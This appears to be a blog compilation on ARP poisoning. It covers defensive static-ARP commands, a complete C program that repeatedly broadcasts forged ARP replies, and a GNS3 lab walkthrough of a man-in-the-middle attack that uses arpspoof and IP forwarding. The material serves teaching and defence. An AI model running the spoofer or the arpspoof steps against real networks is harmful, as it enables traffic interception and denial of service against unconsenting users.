Defense Against ARP Poisoning

Defense Against ARP Poisoning

The main reason why ARP Poisoning occurs is because the victim does not authenticate the ARP replies coming from a malicious user. As a result the ARP cache in the victim's PC contains invalid IP to MAC mapping and packet are sent to the attacker or dropped.

Defense in small networks

To view the current entries in the ARP table
   victim#arp

To add an entry in the ARP as static/permanent

   victim#arp -s <ip_Address> <MAC_address>

The ARP replies send by the attacker don't effect the static entries in the ARP. The ARP replies are recieved by the victim but they don't affect the statically entered ARP.

To delete an entry in the ARP table

  victim#arp -d <ip_address>

The mapping can be stored in a file and given as input to "arp" if there are too many entries.
Create a file with the entries in the following syntax
<MAC_ADDRESS> <IP_ADDRESS>
. .
. .
 
 victim#arp -f <file>

But the table is cleared everytime the system boot or the network is reset.


To make the entries load into table, everytime the network adapter is turned UP.
create a file in the /etc/network/if-up.d/ directory with the following syntax

#!/bin/sh
   arp -i eth0 -s <ip_address> <mac_address>
   .
   .

make it executable
  victim# chmod +x /etc/network/if-up.d/<file>
comes to effect only after reboot.

Also if you dont want to accept ARP replies from anyone.
  victim# echo 0 > /proc/sys/net/ipv4/conf/all/arp_accept

ARP Reply Spoof - C code

ARP Reply Spoof- C code

'ARP SPOOFING - VBox+GNS3 test ' contains introduction to ARP, its working and ARP Spoofing. To understand this post it is recommended that you have a basic idea about these topics.

In the code given below we broadcast ARP reply in the interface specified. The interface, source ip address and source MAC address are given as parameter to the program. The destination MAC id is set to all 1s for broadcasting. The ARP reply is broadcasted regularly using sleep() so that the original ARP reply is not cached in the target systems ARP table.


Applications of ARP Spoofing

• Denial of Service: The hacker can broadcast ARP Reply whose source IP is that of a router/gateway and a false source MAC id. Now when a host tries to send a packet to the router/gateway, it is dropped and the hacker has cut off the network from the other side of the gateway (internet).
• Man-in-the-middle : Here the attacker sends ARP reply to the victim-1 stating that it is the victim-2. Also ARP reply is send to victim-2 stating that the attacker is the victim-1. The packet forwarding feature is enabled in the attacker so that all packets between the victim-1 and victim-2 passes through it.

ARP Packet

Ethernet Packet

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <arpa/inet.h>

#include <signal.h>

#include <sys/socket.h>

#include <net/ethernet.h>

#include <net/if.h>

#include <netpacket/packet.h>

#include <netinet/if_ether.h>

int sock;

#define PACKET_LEN sizeof(struct ether_header) + sizeof(struct ether_arp)

void close_sock()

{

  close(sock);

  exit(0);

}

int main(int argc, char ** argv)

{

 char packet[PACKET_LEN];

 struct sockaddr_ll device;

 struct ether_header * eth = (struct ether_header *) packet;

 struct ether_arp * arp = (struct ether_arp *) (packet + sizeof(struct ether_header));

 

 if (argc < 4) 

 {

    puts("Usage: ./a.out <interface> <source ip address> <source mac address>");

  exit(1);

 }

 sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));

 if (sock < 0)

   perror("socket"), exit(1);

 signal(SIGINT, close_sock);

  //Source Hardware Address : ARP Packet

  sscanf(argv[3], "%x:%x:%x:%x:%x:%x",  (unsigned int *) &arp->arp_sha[0],

(unsigned int *) &arp->arp_sha[1],

(unsigned int *) &arp->arp_sha[2],

(unsigned int *) &arp->arp_sha[3],

(unsigned int *) &arp->arp_sha[4],

(unsigned int *) &arp->arp_sha[5]);

  //Source Protocol Address : ARP Packet

  sscanf(argv[2], "%d.%d.%d.%d", (int *) &arp->arp_spa[0],

                         (int *) &arp->arp_spa[1],

                         (int *) &arp->arp_spa[2],

                         (int *) &arp->arp_spa[3]);

 //Ethernet Packet

 memset(eth->ether_dhost, 0xff, ETH_ALEN); //destination address : broadcast address

 memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN); //source address

 eth->ether_type = htons(ETH_P_ARP); //type

 //ARP Packet

 arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER); //Format of hardware address

 arp->ea_hdr.ar_pro = htons(ETH_P_IP); //Format of protocol address.

 arp->ea_hdr.ar_hln = ETH_ALEN; //Length of hardware address.

 arp->ea_hdr.ar_pln = 4; //Length of protocol address.

 arp->ea_hdr.ar_op = htons(ARPOP_REPLY); //ARP operation : REPLY

 memset(arp->arp_tha, 0xff, ETH_ALEN); //Target hardware address.

 memset(arp->arp_tpa, 0x00, 4); //Target protocol address.

 memset(&device, 0, sizeof(device));

 device.sll_ifindex = if_nametoindex(argv[1]); //Interface number

 device.sll_family = AF_PACKET;

 memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN); //Physical layer address

 device.sll_halen = htons(ETH_ALEN); //Length of address

 printf("Press Ctrl+C to stop \n");

 while (1) {

   printf("Broadcasting on %s: %s is at %s\n", argv[1], argv[2], argv[3]);

   sendto(sock, packet, PACKET_LEN, 0, (struct sockaddr *) &device, sizeof(device));

   sleep(2);

 }

 return 0;

}

ARP SPOOFING - VBox+GNS3 test

ARP SPOOFING - VBox+GNS3 test

Address Resolution Protocol (ARP) is a protocol used for resolution of network layer addresses (IP address) into link layer addresses (MAC address). ARP was defined by RFC 826 in 1982. It is a request and reply protocol and used only within the boundaries of a single network, never across internetwork nodes.

ARP works on Ethernet networks as follows : 
When any device wishes to send data to another target device over Ethernet, it must first determine the MAC address of that target given its IP address These IP-to-MAC address mappings are derived from an ARP cache maintained on each device. If the given IP address does not appear in a device's cache, that device cannot direct messages to that target until it obtains a new mapping. To do this, the initiating device first sends an ARP request broadcast message on the local subnet. The host with the given IP address sends an ARP reply in response to the broadcat, allowing the initiating device to update its cache and proceed to deliver messages directly to the target. ARP does not provide methods for authenticating ARP replies on a network, ARP replies can come from systems other than the one with the required Layer 2 address.

In ARP spoofing the answering system, or spoofer, replies to a request for another system's address with the aim of intercepting data bound for that system. A malicious user may use ARP spoofing to perform a man-in-the-middle or denial-of-service attack on other users on the network.

Here in this tutorial we are trying a man-in-the-middle attack where we send ARP reply to the router from the attacker stating that it is the victim.Also ARP reply is send to victim stating that the attacker is the router.

Setup a network with at least 2 host connected to a Ethernet switch. This switch is connected to a router. The network I used is shown below.

Network Simulation Software : GNS3

R1 :             Cisco 3620 Router| 192.168.1.1
BT5R2 :          BackTrack 5 R2 | 192.168.1.2 | MAC_ID_1 | Attacker
Mint 12 :             Linux Mint 12  | 192.168.1.3 | MAC_ID_2 | Victim

BT5R2
terminal#1 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.1 192.168.1.3 
This sends ARP reply to R1 stating that BT5R2 is 192.168.1.3
so R1 saves MAC_ID_1 as the MAC ID of 192.168.1.3
This is reply is send regularly so dont close this process

terminal#2 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.3 192.168.1.1
This sends ARP reply to Mint 12 stating that BT5R2 is 192.168.1.1
so Mint 12 saves MAC_ID_1 as the MAC ID of 192.168.1.1
This is reply is send regularly so dont close this process

terminal#3 @ BT5R2
BT5R2# echo 1 > /proc/sys/net/ipv4/ip_forward
Enable IP forwarding
BT5R2# wireshark & 
So that you can capture the packets for verification


Mint 12
Mint12# ping 192.168.1.1
ping R1, check wireshark @ BT5R2 for 'Redirect' packets.
Those packets will be highlighted in Black.

R1
To check R1 ARP mapping 
R1#show arp